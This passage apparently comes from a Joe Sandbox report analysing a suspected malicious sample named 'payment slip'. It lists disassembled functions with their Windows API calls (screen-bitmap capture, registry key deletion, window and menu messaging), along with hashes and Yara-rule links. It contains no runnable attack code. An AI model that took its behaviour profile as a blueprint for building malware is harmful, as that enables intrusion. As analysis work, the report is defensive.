                                        • Opcode ID: b1e374eaaa1d458aee063761217fe0112797cde2f3eeb8d522a3edc35c0aca98
                                        • Instruction ID: 96951f22c13feca6e884b6fae4d2f18ea9b4bc551357cb50b1bb8483d6b836d8
                                        • Opcode Fuzzy Hash: b1e374eaaa1d458aee063761217fe0112797cde2f3eeb8d522a3edc35c0aca98
                                        • Instruction Fuzzy Hash: F1C1AF34208201AFD725DF14C494FAABBE5FF85318F14845CF59A8B2A2CBB5ED45CB91
                                        Function 000C8D0E Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 221windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00049BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00049BB2
                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 000C8D5A
                                        • GetFocus.USER32 ref: 000C8D6A
                                        • GetDlgCtrlID.USER32(00000000), ref: 000C8D75
                                        • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 000C8E1D
                                        • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 000C8ECF
                                        • GetMenuItemCount.USER32(?), ref: 000C8EEC
                                        • GetMenuItemID.USER32(?,00000000), ref: 000C8EFC
                                        • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 000C8F2E
                                        • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 000C8F70
                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 000C8FA1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                        • String ID: U$0
                                        • API String ID: 1026556194-4222668077
                                        • Opcode ID: bfca432566387508896ddc6c2c5d7d327a812ea98004c2f1074f1c4d32989e2b
                                        • Instruction ID: 1a384850197eca238cbc91ad6a4d1256e79804a3969b1575ace1fbe96f2080a5
                                        • Opcode Fuzzy Hash: bfca432566387508896ddc6c2c5d7d327a812ea98004c2f1074f1c4d32989e2b
                                        • Instruction Fuzzy Hash: AD818C71508301ABE750CF24C884FAF7BE9FB89314F04892DF98997292DB74D941CBA5
                                        Function 000B255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDC.USER32(00000000), ref: 000B25D8
                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 000B25E8
                                        • CreateCompatibleDC.GDI32(?), ref: 000B25F4
                                        • SelectObject.GDI32(00000000,?), ref: 000B2601
                                        • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 000B266D
                                        • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 000B26AC
                                        • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 000B26D0
                                        • SelectObject.GDI32(?,?), ref: 000B26D8
                                        • DeleteObject.GDI32(?), ref: 000B26E1
                                        • DeleteDC.GDI32(?), ref: 000B26E8
                                        • ReleaseDC.USER32(00000000,?), ref: 000B26F3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                        • String ID: (
                                        • API String ID: 2598888154-3887548279
                                        • Opcode ID: 1a21e7de8541ee85219593af8c0ec26de49ec94e307cf2115521eb43e74131e5
                                        • Instruction ID: 876d65c138f2d1a39dfb8c82251c390dfd0dd135ce49638b08bbf1eb2e81fef2
                                        • Opcode Fuzzy Hash: 1a21e7de8541ee85219593af8c0ec26de49ec94e307cf2115521eb43e74131e5
                                        • Instruction Fuzzy Hash: F861F0B5D00219EFDB14CFA8D884EEEBBB5FF48310F248529E959A7250D774A9418FA0
                                        Function 0006DA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • ___free_lconv_mon.LIBCMT ref: 0006DAA1
                                          • Part of subcall function 0006D63C: _free.LIBCMT ref: 0006D659
                                          • Part of subcall function 0006D63C: _free.LIBCMT ref: 0006D66B
                                          • Part of subcall function 0006D63C: _free.LIBCMT ref: 0006D67D
                                          • Part of subcall function 0006D63C: _free.LIBCMT ref: 0006D68F
                                          • Part of subcall function 0006D63C: _free.LIBCMT ref: 0006D6A1
                                          • Part of subcall function 0006D63C: _free.LIBCMT ref: 0006D6B3
                                          • Part of subcall function 0006D63C: _free.LIBCMT ref: 0006D6C5
                                          • Part of subcall function 0006D63C: _free.LIBCMT ref: 0006D6D7
                                          • Part of subcall function 0006D63C: _free.LIBCMT ref: 0006D6E9
                                          • Part of subcall function 0006D63C: _free.LIBCMT ref: 0006D6FB
                                          • Part of subcall function 0006D63C: _free.LIBCMT ref: 0006D70D
                                          • Part of subcall function 0006D63C: _free.LIBCMT ref: 0006D71F
                                          • Part of subcall function 0006D63C: _free.LIBCMT ref: 0006D731
                                        • _free.LIBCMT ref: 0006DA96
                                          • Part of subcall function 000629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0006D7D1,00000000,00000000,00000000,00000000,?,0006D7F8,00000000,00000007,00000000,?,0006DBF5,00000000), ref: 000629DE
                                          • Part of subcall function 000629C8: GetLastError.KERNEL32(00000000,?,0006D7D1,00000000,00000000,00000000,00000000,?,0006D7F8,00000000,00000007,00000000,?,0006DBF5,00000000,00000000), ref: 000629F0
                                        • _free.LIBCMT ref: 0006DAB8
                                        • _free.LIBCMT ref: 0006DACD
                                        • _free.LIBCMT ref: 0006DAD8
                                        • _free.LIBCMT ref: 0006DAFA
                                        • _free.LIBCMT ref: 0006DB0D
                                        • _free.LIBCMT ref: 0006DB1B
                                        • _free.LIBCMT ref: 0006DB26
                                        • _free.LIBCMT ref: 0006DB5E
                                        • _free.LIBCMT ref: 0006DB65
                                        • _free.LIBCMT ref: 0006DB82
                                        • _free.LIBCMT ref: 0006DB9A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                        • String ID:
                                        • API String ID: 161543041-0
                                        • Opcode ID: d4cec0f93a283829c47e7855e43a06da076d4055ac0969700c7afc81fe69d696
                                        • Instruction ID: 551bb117f3117c10848991871839812c617d277902a6eb395c088ae7af53544e
                                        • Opcode Fuzzy Hash: d4cec0f93a283829c47e7855e43a06da076d4055ac0969700c7afc81fe69d696
                                        • Instruction Fuzzy Hash: 1B315831B08604DFEB65AA79E845BAAB7EBFF40350F15442AE449D7192DF30EC80CB20
                                        Function 0009365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetClassNameW.USER32(?,?,00000100), ref: 0009369C
                                        • _wcslen.LIBCMT ref: 000936A7
                                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00093797
                                        • GetClassNameW.USER32(?,?,00000400), ref: 0009380C
                                        • GetDlgCtrlID.USER32(?), ref: 0009385D
                                        • GetWindowRect.USER32(?,?), ref: 00093882
                                        • GetParent.USER32(?), ref: 000938A0
                                        • ScreenToClient.USER32(00000000), ref: 000938A7
                                        • GetClassNameW.USER32(?,?,00000100), ref: 00093921
                                        • GetWindowTextW.USER32(?,?,00000400), ref: 0009395D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                        • String ID: %s%u
                                        • API String ID: 4010501982-679674701
                                        • Opcode ID: 9c739ea9f4fcdc8c4c7389fbb61dcfb61d3b701a62bbc7808e7df98bf4d94b64
                                        • Instruction ID: 88c7fbfef6435710bda7f19b3ab2e300aeba1fbb666080f69ebe9cf7073f5f9d
                                        • Opcode Fuzzy Hash: 9c739ea9f4fcdc8c4c7389fbb61dcfb61d3b701a62bbc7808e7df98bf4d94b64
                                        • Instruction Fuzzy Hash: 8491AD71204606AFDB19DF64C885FEAF7E8FF44350F008629F999D2191DB30AA45DF91
                                        Function 00094954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetClassNameW.USER32(?,?,00000400), ref: 00094994
                                        • GetWindowTextW.USER32(?,?,00000400), ref: 000949DA
                                        • _wcslen.LIBCMT ref: 000949EB
                                        • CharUpperBuffW.USER32(?,00000000), ref: 000949F7
                                        • _wcsstr.LIBVCRUNTIME ref: 00094A2C
                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00094A64
                                        • GetWindowTextW.USER32(?,?,00000400), ref: 00094A9D
                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00094AE6
                                        • GetClassNameW.USER32(?,?,00000400), ref: 00094B20
                                        • GetWindowRect.USER32(?,?), ref: 00094B8B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                        • String ID: ThumbnailClass
                                        • API String ID: 1311036022-1241985126
                                        • Opcode ID: 8236d0a5cdd0df363d3e16c82a8176dd4e72ce613c7e76c5858f36aa3882bff2
                                        • Instruction ID: 578f2f02ea53a0c183dcf1abae481083bc79ff63b7ee482a4dad64f02209ced6
                                        • Opcode Fuzzy Hash: 8236d0a5cdd0df363d3e16c82a8176dd4e72ce613c7e76c5858f36aa3882bff2
                                        • Instruction Fuzzy Hash: A291BE710082059FEF14CF14C985FAA77E8FF84314F048469FD899A196EB34ED46DBA2
                                        Function 000C3A23 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 182windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 000C3A9D
                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 000C3AA0
                                        • GetWindowLongW.USER32(?,000000F0), ref: 000C3AC7
                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 000C3AEA
                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 000C3B62
                                        • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 000C3BAC
                                        • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 000C3BC7
                                        • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 000C3BE2
                                        • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 000C3BF6
                                        • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 000C3C13
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: MessageSend$LongWindow
                                        • String ID: U
                                        • API String ID: 312131281-2399391058
                                        • Opcode ID: e288c12a2e98389e5cff09ec5b4f901061728430ba0d4c0d0079fc6ab5e8c090
                                        • Instruction ID: a1d81d38b03c6e566e599dd2d9538a935f25e5ca9e61876364e8f88be825b3c9
                                        • Opcode Fuzzy Hash: e288c12a2e98389e5cff09ec5b4f901061728430ba0d4c0d0079fc6ab5e8c090
                                        • Instruction Fuzzy Hash: 5D616A75A00248AFDB10DFA8CC81FEE77F8EB09704F104199FA55A72A2D774AE85DB50
                                        Function 0009DC0E Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetFileVersionInfoSizeW.VERSION(?,?), ref: 0009DC20
                                        • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0009DC46
                                        • _wcslen.LIBCMT ref: 0009DC50
                                        • _wcsstr.LIBVCRUNTIME ref: 0009DCA0
                                        • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 0009DCBC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                        • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                        • API String ID: 1939486746-1459072770
                                        • Opcode ID: c0258e8c1fc4a1feefa99d102120c0894e144d90a2045beb99f80dde1efcffc1
                                        • Instruction ID: 6b573728c68f310f5531d04b19be6fa18a9a4a48ef48f27b49dae16dcee5c821
                                        • Opcode Fuzzy Hash: c0258e8c1fc4a1feefa99d102120c0894e144d90a2045beb99f80dde1efcffc1
                                        • Instruction Fuzzy Hash: CE4144729802057AEB14AB74DC07EFF37ACEF42751F10046AFE04AA1C3EB759901A7A4
                                        Function 000BCC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 000BCC64
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 000BCC8D
                                        • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 000BCD48
                                          • Part of subcall function 000BCC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 000BCCAA
                                          • Part of subcall function 000BCC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 000BCCBD
                                          • Part of subcall function 000BCC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 000BCCCF
                                          • Part of subcall function 000BCC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 000BCD05
                                          • Part of subcall function 000BCC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 000BCD28
                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 000BCCF3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                        • API String ID: 2734957052-4033151799
                                        • Opcode ID: 69d6af0e2b6794f9bba4f85ac97cc8785739a9b7e724ef4e9a0895d87e05c03e
                                        • Instruction ID: e91084eddf09d396be1db44bbc9d9849a99be5c8bc5b94296d6c8e0d83058239
                                        • Opcode Fuzzy Hash: 69d6af0e2b6794f9bba4f85ac97cc8785739a9b7e724ef4e9a0895d87e05c03e
                                        • Instruction Fuzzy Hash: 94316E75901129BBFB208B55DC88EFFBBBCEF56750F040169E909E2241DA349E45AAA0
                                        Function 0009E6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • timeGetTime.WINMM ref: 0009E6B4
                                          • Part of subcall function 0004E551: timeGetTime.WINMM(?,?,0009E6D4), ref: 0004E555
                                        • Sleep.KERNEL32(0000000A), ref: 0009E6E1
                                        • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0009E705
                                        • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0009E727
                                        • SetActiveWindow.USER32 ref: 0009E746
                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0009E754
                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 0009E773
                                        • Sleep.KERNEL32(000000FA), ref: 0009E77E
                                        • IsWindow.USER32 ref: 0009E78A
                                        • EndDialog.USER32(00000000), ref: 0009E79B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                        • String ID: BUTTON
                                        • API String ID: 1194449130-3405671355
                                        • Opcode ID: 83c500339d79cea6fa6c08803896e8ee9dda54db51e64a5dfb8f5670af2aa27f
                                        • Instruction ID: 47abf56792c8fe5219ffaf1bd236b0ac23ce5b827474d25e5e1fe2581e8899ee
                                        • Opcode Fuzzy Hash: 83c500339d79cea6fa6c08803896e8ee9dda54db51e64a5dfb8f5670af2aa27f
                                        • Instruction Fuzzy Hash: A121A5B0204285BFFF109F60EC8DE397BA9F755748F240424F949819B1DBB6AC80EB25
                                        Function 0009E9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0009EA5D
                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0009EA73
                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0009EA84
                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0009EA96
                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0009EAA7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: SendString$_wcslen
                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                        • API String ID: 2420728520-1007645807
                                        • Opcode ID: 85634c65baa8d69abbfefcf5de051f9d51ee0a3a180da5e0f0803b92bd4c7d6e
                                        • Instruction ID: ed1417960ead08646771d537dcf41075fb1f106b10363d5dded2caf870282b51
                                        • Opcode Fuzzy Hash: 85634c65baa8d69abbfefcf5de051f9d51ee0a3a180da5e0f0803b92bd4c7d6e
                                        • Instruction Fuzzy Hash: 4B117331A9425D79DB21E7A1DC4AEFF6ABCEBD1B00F400429B601A60D1EEB15E05D6B1
                                        Function 00095CC6 Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDlgItem.USER32(?,00000001), ref: 00095CE2
                                        • GetWindowRect.USER32(00000000,?), ref: 00095CFB
                                        • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00095D59
                                        • GetDlgItem.USER32(?,00000002), ref: 00095D69
                                        • GetWindowRect.USER32(00000000,?), ref: 00095D7B
                                        • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00095DCF
                                        • GetDlgItem.USER32(?,000003E9), ref: 00095DDD
                                        • GetWindowRect.USER32(00000000,?), ref: 00095DEF
                                        • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00095E31
                                        • GetDlgItem.USER32(?,000003EA), ref: 00095E44
                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00095E5A
                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00095E67
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Window$ItemMoveRect$Invalidate
                                        • String ID:
                                        • API String ID: 3096461208-0
                                        • Opcode ID: 32e13e3e5984a48a1a24e355311910ce5dfceea4e7e0e450e41972716ddc633e
                                        • Instruction ID: 9237768a5c4e4bc090055c9a7e91bc410634b286fbe487dc112d48c025dbc9a6
                                        • Opcode Fuzzy Hash: 32e13e3e5984a48a1a24e355311910ce5dfceea4e7e0e450e41972716ddc633e
                                        • Instruction Fuzzy Hash: E0510CB1A00605AFEF19CF69DD89EAEBBB5EB48301F148229F519E7290D7749E00DB50
                                        Function 000C50D4 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 162windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 000C5186
                                        • ShowWindow.USER32(?,00000000), ref: 000C51C7
                                        • ShowWindow.USER32(?,00000005,?,00000000), ref: 000C51CD
                                        • SetFocus.USER32(?,?,00000005,?,00000000), ref: 000C51D1
                                          • Part of subcall function 000C6FBA: DeleteObject.GDI32(00000000), ref: 000C6FE6
                                        • GetWindowLongW.USER32(?,000000F0), ref: 000C520D
                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 000C521A
                                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 000C524D
                                        • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 000C5287
                                        • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 000C5296
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                        • String ID: U
                                        • API String ID: 3210457359-2399391058
                                        • Opcode ID: 39b234cb16905c7921fee5c8db7bf802852ab807337f129d23c5474a6cf46d6a
                                        • Instruction ID: 87acc9f074f1e341ce06a1549987f048ecb433208b9e574cb4286ace98a95a6a
                                        • Opcode Fuzzy Hash: 39b234cb16905c7921fee5c8db7bf802852ab807337f129d23c5474a6cf46d6a
                                        • Instruction Fuzzy Hash: 0E517C38A40A08BEEB309F24CC49FDD7BE5EB46326F584119FA19962E1D775B9C0DB40
                                        Function 000996E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON
                                        Download Yara Rule
